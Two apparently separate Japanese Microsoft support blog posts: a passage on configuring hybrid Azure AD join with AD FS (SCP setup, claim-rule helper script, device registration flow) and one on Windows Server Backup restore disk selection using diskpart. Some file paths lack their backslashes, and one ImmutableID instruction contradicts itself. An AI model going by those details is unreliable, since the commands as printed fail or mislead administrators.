補足のポイントは私たちサポート サービスに最もお問い合わせの多いシナリオである「"AD FS がある場合の" ハイブリッド Azure Active Directory 参加済みデバイスの構成方法」です。

なお、本記事では要所についての補足となります。
全ての手順の確認は上記ページをご確認ください。

2. ハイブリッド Azure Active Directory 参加済みデバイスの構成とは

ハイブリッド Azure Active Directory 参加済みデバイスの構成とは、以下を実現するための構成です。

• オンプレミス AD にデバイスが参加している
• 同時に Azure AD にも同デバイスを登録する

この構成を実現することで、該当のデバイスに対して、条件付きアクセスで「ドメイン参加済みであることが必要」によるアクセスの制御が行えるようになります。

条件付きアクセスで「ドメイン参加済みであることが必要」を使用することで、以下のアクセス制御を行えます。

• オンプレミス AD に参加しているデバイスであれば、アクセスを許可する

つまり、「社給デバイスのみアクセスを許可したい」などの要件に対応することができます。
そのための前提となる構成がハイブリッド Azure Active Directory 参加済みデバイスの構成です。

3. 「手順 1 : サービス接続ポイントの構成」についての補足

以下ページの「手順 1: サービス接続ポイントの構成」について、AD FS が存在している環境を前提に補足します。

ハイブリッド Azure Active Directory 参加済みデバイスの構成方法

サービス接続ポイント (SCP) は何に使用されるか

ハイブリッド Azure AD 参加では、オンプレミスのドメインに参加しているデバイスは Azure AD に対して自身を登録する必要があります。この登録処理において各デバイスが参照する先がサービス接続ポイント (SCP) です。
サービス接続ポイント (SCP) が登録されていない場合、デバイス登録時に適切に AD FS への認証が行われません。
結果、デバイス登録に失敗します。
サービス接続ポイント (SCP) の実体は以下に登録されます。

• CN=62a0ff2e-97b9-4513-943f-0d221bd30080,CN=Device Registration Configuration,CN=Services,CN=Configuration,DC=contoso,DC=local (「DC=contoso,DC=local」部分は環境に合わせて読み替えてください) の keywords 属性の値

この keywords 属性の値として登録される以下 2 つがサービス接続ポイント (SCP) の実体です。

• azureADId:<該当 Azure AD のテナント ID>
• azureADName:<該当 Azure AD のいずれかの Federated ドメイン>

azureADName に設定される Federated ドメインは、登録先の Azure AD に関連付けられた Federated ドメインが設定されます。
複数の Federated ドメインがある場合にも、サービス接続ポイント (SCP) を複数作ったり、すべての Federated ドメインを追加する必要はありません。
いずれかの 1 つの Federated ドメインがサービス接続ポイント (SCP) に設定されていれば問題ありません。
各デバイスは、 SCP に登録されている情報を元に Azure AD から AD FS の情報を参照し、 AD FS への認証が行われます。

このサービス接続ポイント (SCP) を構成するコマンドが以下になります。

• Initialize-ADSyncDomainJoinedComputerSync

Initialize-ADSyncDomainJoinedComputerSync を使用してサービス接続ポイント (SCP) を構成する

上記の通り、Initialize-ADSyncDomainJoinedComputerSync コマンドはサービス接続ポイント (SCP) を構成します。
該当環境のドメイン コントローラーの OS が Windows 2008 より新しいバージョンの場合に使用できるコマンドです。
このコマンドの使用方法は以下になります。

1. エンタープライズ管理者で Azure AD Connect サーバーにサインインする
2. PowerShell を管理者として起動する
3. 以下のコマンドを実行して Active Directory PowerShell モジュールと AD DS ツールをインストールする
   Add-WindowsFeature RSAT-AD-PowerShell,RSAT-AD-AdminCenter
4. 以下の弊社公開情報に沿って MSOnline (Azure AD v1) をインストールする
   Azure Active Directory の PowerShell モジュール
5. PowerShell を閉じる
6. 再度、PowerShell を管理者として起動する
7. 以下のコマンドを実行してサービス接続ポイント (SCP) オブジェクトを構成する
   Import-Module -Name "C:Program FilesMicrosoft Azure Active Directory ConnectAdPrepAdSyncPrep.psm1";
   $aadAdminCred = Get-Credential;
   ※ 認証画面が表示されるので対象の Azure AD の管理者の資格情報を入力します
   Initialize-ADSyncDomainJoinedComputerSync -AdConnectorAccount "xxxx" -AzureADCredentials $aadAdminCred;
   ※ xxxx 部分はオンプレミス AD の管理者のユーザー名を domainuser の形式で入力します

この手順が正常に行えない場合、または該当環境のドメイン コントローラーの OS が Windows 2008 以前のバージョンの場合は、手動でサービス接続ポイント (SCP) を構成します。

手動でサービス接続ポイント (SCP) を構成する

Initialize-ADSyncDomainJoinedComputerSync を使用した登録ができない場合 (ドメイン コントローラーの OS が Windows 2008 以前のバージョンの場合を含む)、手動でサービス接続ポイント (SCP) を構成します。
その方法は以下になります。

1. 以下の公開情報に沿ってテナント ID を確認する
   Office 365 テナント ID を検索する
2. エンタープライズ管理者でドメイン コントローラーにサインインする
3. PowerShell を管理者として起動する
4. 以下のコマンドを実行してサービス接続ポイント (SCP) オブジェクトを構成する
   $verifiedDomain = "contoso.com"
   ※ 該当 Azure AD に登録されているいずれかの Federated ドメインを指定します。
   $tenantID = "xxxxxx"
   ※ 「xxxxxx」部分に上記で確認したテナント ID を指定します。
   $configNC = "CN=Configuration,DC=corp,DC=contoso,DC=com"
   $de = New-Object System.DirectoryServices.DirectoryEntry
   $de.Path = "LDAP://CN=Services," + $configNC
   $deDRC = $de.Children.Add("CN=Device Registration Configuration", "container")
   $deDRC.CommitChanges()
   $deSCP = $deDRC.Children.Add("CN=62a0ff2e-97b9-4513-943f-0d221bd30080", "serviceConnectionPoint")
   $deSCP.Properties["keywords"].Add("azureADName:" + $verifiedDomain)
   $deSCP.Properties["keywords"].Add("azureADId:" + $tenantID)
   $deSCP.CommitChanges()

4. 「手順 2 : 要求の発行のセットアップ」についての補足

以下ページの「手順 2: 要求の発行のセットアップ」について、AD FS が存在している環境を前提に補足します。

ハイブリッド Azure Active Directory 参加済みデバイスの構成方法

なお、AD FS でフェデレーションを行っていない環境では、この「手順 2: 要求の発行のセットアップ」の作業は不要です。

クレーム ルールは何に使用されるか

この手順ではクレーム ルールを設定します。
AD FS でデバイスの認証が行われると AD FS よりトークンが発行されます。
それをデバイスが Azure AD のデバイス登録を管理しているサービス (Azure AD DRS) に提示することでハイブリッド Azure AD 参加のデバイス登録が行われます。
ここで設定するクレーム ルールは、その AD FS から発行されるトークンにデバイス登録に必要なクレームを含めるためのものです。

これらのクレーム ルールが適切に設定されていない場合、 AD FS から発行されるトークン内に Azure AD DRS が求めるクレームが含まれない状態となるため、デバイス登録に失敗します。

ヘルパースクリプトの使い方

これらのクレーム ルールの登録方法として「手順 2: 要求の発行のセットアップ」内で記載されているヘルパースクリプトがあります。
このヘルパースクリプトの使い方について補足します。

ヘルパースクリプトのはじめの 3 行は、環境に合わせて設定をします。

----
$multipleVerifiedDomainNames = $false
$immutableIDAlreadyIssuedforUsers = $false
$oneOfVerifiedDomainNames = 'example.com'
----

それぞれの行について説明します。

$multipleVerifiedDomainNames = $false

ここで指定をする値は以下のいずれかです。

• $false
• $true

1 つの Federated ドメインのみの場合は $false を指定します。
複数の Federated ドメインがある場合は $true を指定します。

1 つか、複数かというのは、より正確にいうと、AD FS を構成する際に Federated ドメインの設定をする際に以下のコマンドを実行している場合は $false を指定します。

• Convert-MsolDomainToFederated -DomainName xxx

Federated ドメインを設定する際に以下のコマンドを実行している場合は $true を指定します。

• Convert-MsolDomainToFederated -DomainName xxx -SupportMultipleDomain

厳密に $false と $true のどちらを指定するかの確認方法を以下に記載します。
(Federated ドメインが 1 つの場合も、-SupportMultipleDomain を指定して作成されている場合があるためです)

1. 以下の弊社公開情報に沿って MSOnline (Azure AD v1) をインストールする
   Azure Active Directory の PowerShell モジュール
2. 以下のコマンドを実行して対象の Azure AD に接続する
   Connect-MsolService
   ※ 認証が発生するので対象の Azure AD の全体管理者の資格情報を入力します。
3. 以下のコマンドを実行してドメイン情報を取得する
   Get-MsolDomain
4. 以下のコマンドを実行して IssuerUri を取得する
   Get-MsolDomainFederationSettings -DomainName xxxx | select IssuerUri
   ※
   「xxxx」部分は、上記 3. で取得したドメイン情報の中から Federated ドメインを 1 つ選んで指定してください。
   Federated ドメインが 1 つのみの場合は、それを指定してください。
   Federated ドメインが複数ある場合は、どれでも結構です。
5. 取得した以下の IssuerUri の値から $false と $true のどちらを指定するかを判断する
   IssuerUri
   ---------
   http://xxxx/adfs/services/trust/
   ※
   「xxxx」部分が AD FS のフェデレーション サービス名と一致する場合は、$false を指定します。
   「xxxx」部分が AD FS のフェデレーション サービス名と一致しない場合は、$true を指定します。

$immutableIDAlreadyIssuedforUsers = $false

ここで指定をする値は以下のいずれかです。

• $false
• $true

ユーザーの認証時に ImmutableID を発行していない場合は $false を指定します。
ユーザーの認証時に ImmutableID を発行している場合は $false を指定します。

ユーザーの認証時に ImmutableID は必ず発行されることを確認しています。
そのため、必ず $true を指定します。

$oneOfVerifiedDomainNames = 'example.com'

ここで指定をする値は対象の Azure AD に登録されている Federated ドメインのいずれかです。
Federated ドメインが 1 つのみの場合は、それを指定してください。
Federated ドメインが複数ある場合は、どれでも結構です。

以上を設定した上で、ヘルパースクリプトをご利用ください。

5. Windows 10 のデバイス登録の流れについて

Windows 10 のデバイス登録の流れについて説明します。

”AD FS がある場合の” ハイブリッド Azure Active Directory 参加済みデバイスの構成が正しく構築できている場合、Windows 10 を新規にオンプレミスのドメインに参加させると、以下の流れで Azure AD へのデバイス登録がされます。
(実際には様々な処理が並列して行われているはずですので、前後する部分もあります)

1. Workgroup の Windows 10 にローカルユーザーでサインインする
2. Windows 10 をドメインに参加させる
   
3. オンプレミス AD に Windows 10 のコンピューター オブジェクトが作成される
4. Windows 10 からサービス接続ポイント (SCP) を参照する
5. Windows 10 のコンピューター オブジェクトで AD FS の認証をする
6. AD FS から Windows 10 にトークンが発行される
7. Windows 10 から Azure AD にデバイス登録をする
8. Windows 10 に「xxxx ドメインへようこそ。」のメッセージボックスが表示される
   
9. このメッセージボックスが表示されている時点で Azure AD 側にもデバイスが登録されている
   
   ※ この時点では、[所有者] が [該当なし] になります。
10. 以降、Azure AD Connect で同期が実行されると、オンプレミス AD 上のコンピューターオブジェクトの情報が、Azure AD 上のデバイスに上書きされる
    
    ※ この時点で [所有者] が登録されます。

6. Windows 10 のデバイス登録について注意事項

Workgroup の Windows 10 をオンプレミス AD のドメインに参加させる際に以下のダイアログが表示され、ここでオンプレミス AD のユーザー資格情報を入力します。

ここに入力をしたユーザー Azure AD 上に登録されるデバイスの所有者になります。
仮にここで入力をするユーザーが Azure AD には同期されておらず、オンプレミス AD 上だけに存在するユーザーであった場合、以降ずっと Azure AD 上でそのデバイスの所有者は [該当なし] のままになります。
このデバイスの所有者情報については、 他ユーザーでこの Windows 10 にサインインしても変わらず、これを変更するためには、一旦 Workgroup に戻して再度オンプレミス AD へ、所有者にしたいユーザーの資格情報を利用しての参加が必要になります (もちろん所有者にしたいユーザーは Azure AD に同期済み / 同期予定のユーザーである必要があります)。

7. ダウンレベルの Windows (Windows 7、Windows 8.1) のデバイス登録の流れ

ダウンレベルの Windows (Windows 7、Windows 8.1) のデバイス登録の流れについて説明します。

”AD FS がある場合の” ハイブリッド Azure Active Directory 参加済みデバイスの構成が正しく構築できている場合、ダウンレベルの Windows は以下の流れでデバイス登録されます。
Windows 7 で説明をしますが、Windows 8.1 でも同様です。
(実際には様々な処理が並列して行われているはずですので、前後する部分もあります)

1. Workgroup の Windows 7 にローカルユーザーでサインインする
2. Windows 7 をドメインに参加させる
3. オンプレミス AD に Windows 7 のコンピューター オブジェクトが作成される
4. Windows 7 の再起動を求められるので再起動する
5. Windows 7 にドメインユーザーでサインインする
6. Windows 7 からサービス接続ポイント (SCP) を参照する
7. Windows 7 にサインインしたドメインユーザーで AD FS の認証をする
8. AD FS から Windows 7 にトークンが発行される
9. Windows 7 から Azure AD にデバイス登録をする
10. この時点ではじめて Azure AD 側にデバイスが登録される
    
    ※ この時点で [所有者] も登録されています。

8. ダウンレベルの Windows (Windows 7、Windows 8.1) のデバイス登録について注意事項

ダウンレベルの Windows をオンプレミス AD のドメインに参加させる際に表示される以下のダイアログに入力した資格情報は Windows 10 の場合とは異なり所有者になりません。

ダウンレベルの Windows はドメイン参加後にサインインを行ったドメインユーザーで Azure AD へのデバイス登録が行われます。
ダウンレベルの Windows に別のドメインユーザーでサインインを行うと、同様にその別ユーザーにてデバイス登録が行われ、Azure AD 上に複数のデバイスが登録されることになります。

本記事がみなさまの一助になれば幸いです。
引き続きよろしくお願いします。

こんにちは、日本マイクロソフト Windows サポートの高谷です。

不慮の事態に備え、定期的にバックアップを取ることが一般的となっているほか、変更作業の前に念のためにバックアップを取っておくなど、日々の運用の中でバックアップは地味ながら大きな役割を担っています。

マイクロソフトでは、Windows Server の標準のバックアップソフトとして、Windows Server バックアップの機能をご用意しております。今回は、この Windows Server バックアップで取得したバックアップ データをリストアする際の、ディスクの選択についてご説明したいと思います。

■     Windows Server バックアップとリストア

Windows Server バックアップは、その名称の通り、Windows Server に標準で搭載されているバックアップ ツールです。Windows Server 2008 以降で、サーバー マネージャーから機能を追加いただくことでご利用いただけます。

バックアップの取得対象としては、サーバー全体はもちろんのこと、対象のボリュームだけの取得や、システム状態のみ、あるいはベアメタル回復に対応しています。バックアップデータの保管先は、ローカル ディスク、外付けハードディスクやネットワーク経由の共有フォルダに対応しています。

リストア時は、リストア先のディスクはユーザー側で選択は出来ず、システム側でリストア可能なディスクを探し出し、リストア先を決定します。では、バックアップ先の候補として全く同じサイズのディスクが複数存在した場合はどのようなロジックで、どのディスクがリストア先として選出されるのでしょうか。

今回ご説明するケースは、以下の状況で取得したバックアップをリストアすることを想定しています。

// 状況

・OS : Windows Server 2012 R2
・ファームウェア : UEFI
・バックアップ対象：サーバー全体
..........ディスク構成 > Disk 0, 600 GB(C ドライブ 220 GB, D ドライブ 380 GB), GPT パーティションスタイル
....................................>.Disk 1, 600 GB(E ドライブ 220 GB), GPT パーティションスタイル
・バックアップ データ保管先：外付けハードディスク
・ディスクは 2 本とも破損した想定で、リストア時は同じ容量・同じメーカーのディスクを新品で2 枚用意
・リストア時は Windows Server 2012 R2 のインストール用 DVD から起動し、リストア実行

■     リストア時の挙動について

.
では早速、リストア先として、全く同じディスクが複数存在する場合、どのディスクがリストア先として選出されるのかをご説明します。

前提として、リストアの順番としては、最も重要である C ドライブ (システムドライブ) からリストアを行います。ファームウェアが UEFI システムの場合は、OS を起動するディスクは必ずしも Disk 0 である必要はありませんので、接続されているディスクの中でリストアに最適なディスクを探し出し、そこへリストアします。

DVD から起動した OS は、接続しているディスクの中から C ドライブのリストア先として最も適したディスクを以下の基準で検索し、最適なディスクがあるか確認します。

・ディスクの署名が一致するか
・パーティション スタイル (MBR or GPT) が一致しているか
・リストア可能なサイズのディスクか

上記が全て一致するものがあれば、そのディスクをバックアップ取得時と同じディスクと判断し、そのディスクへリストアを行います。

最適なディスクの検索は、Disk 0 から順に、基準にマッチしているか確認していきます。ところが今回のケースでは、新品の全く同じサイズのディスクを 2 枚用意したため、どちらも基準にマッチしません。

この場合、基準にマッチしているか確認を行った最後のディスク (ディスク番号の最も大きいディスク) に C ドライブをリストアします。その後、空きディスクへ他のドライブをリストアしますので、バックアップ時とリストア後のディスク番号が逆になる現象が発生します。

// リストア後の状況

・OS : Windows Server 2012 R2
・ファームウェア : UEFI
..........ディスク構成 > Disk 0, 600 GB(E ドライブ 220 GB), GPT パーティションスタイル
....................................>.Disk 1, 600 GB(C ドライブ 220 GB, D ドライブ 380 GB), GPT パーティションスタイル

これはシステムのデザインであり、不具合ではありません。リストア後のシステムへの影響もありませんので、ご安心ください。

■     ディスク番号が逆になる現象の回避策について

.
上記のディスク番号が逆になる現象を回避するためには、バックアップ取得時にディスクの署名を確認しておき、リストア直前にディスクの署名を書き換えることが有効な手段です。ディスク署名の確認方法と、変更方法についてもここでご紹介いたします。

// ディスクの署名の確認方法

1. コマンド プロンプトを管理者権限で起動します。
2. diskpart と入力し、diskpart ユーティリティを起動します。
3. 以下のコマンドを入力します。接続されているディスクが列挙されます。

..........>list disk

出力結果の例)

ディスク        状態                サイズ      空き   ダイナ  GPT
###                                         .................          ミック
--------------     --------------     -----------     ---------   --------    --------
ディスク 0    オンライン     557 GB       0 B                       *
ディスク 1    オンライン     557 GB       0 B                       *

4. 対象のディスクを選択します。例として Disk 0 を選択します。

..........>select disk 0

出力結果の例)

ディスク 0 が選択されました。

5. detail disk コマンドでディスクの詳細情報を参照します。

..........>detail disk

出力結果の例)

LSI MR9362-8i SCSI Disk Device
ディスク ID: {92B2DC6F-1C13-4506-AA35-253702E4AC24}
種類       : RAID
状態       : オンライン
パス       : 1
ターゲット : 0
LUN ID     : 0
場所のパス : PCIROOT(0)#PCI(0100)#PCI(0000)#RAID(P01T00L00)
現在の読み取り専用状態: いいえ
読み取り専用  : いいえ
ブート ディスク  : はい
ページ ファイル ディスク  : はい
休止状態ファイル ディスク  : いいえ
クラッシュ ダンプ ディスク  : はい
クラスター化ディスク  : いいえ

"Disk ID" と表示されているのが、ディスクの署名です。

// ディスクの署名の変更方法

事前準備として、以下の手順にてディスクを初期化し、パーティション スタイルを GPT へ変更しておきます。

1. リストア時に DVD から起動させた OS において、リストアを行う前にコマンド プロンプトを [Sift] + [F10] キーで起動します。
2. diskpart と入力し、diskpart ユーティリティーを起動します。

..........>diskpart

3. 以下のコマンドを入力します。

..........接続されているディスクが列挙されます。

..........>list disk

4. 対象のディスクを選択します。例として Disk 0 を選択します。

..........>select disk 0

5. clean コマンドでディスクを初期化します。

..........>clean

6. パーティション スタイルを GPT に変換します。

..........>convert GPT

パーティション スタイルを GPT に設定したら、ディスクの署名を書き換えます。

7. 以下のコマンドでディスクの署名を書き換えます。

構文)
..........DISKPART> uniqueid disk id <新しい Disk ID>

例)
..........DISKPART> uniqueid disk id 92B2DC6F-1C13-4506-AA35-253702E4AC24

8. 最後にディスク署名が入力した値と一致しているか、detail disk コマンドで確認します。

..........>detail disk

ディスク署名の変更方法は以上です。
以上の手順でディスク署名をバックアップ時のものと同じに設定しておくことで、リストア先のディスクを誘導することが可能です。

本ブログが少しでも皆様のお役に立てますと幸いです。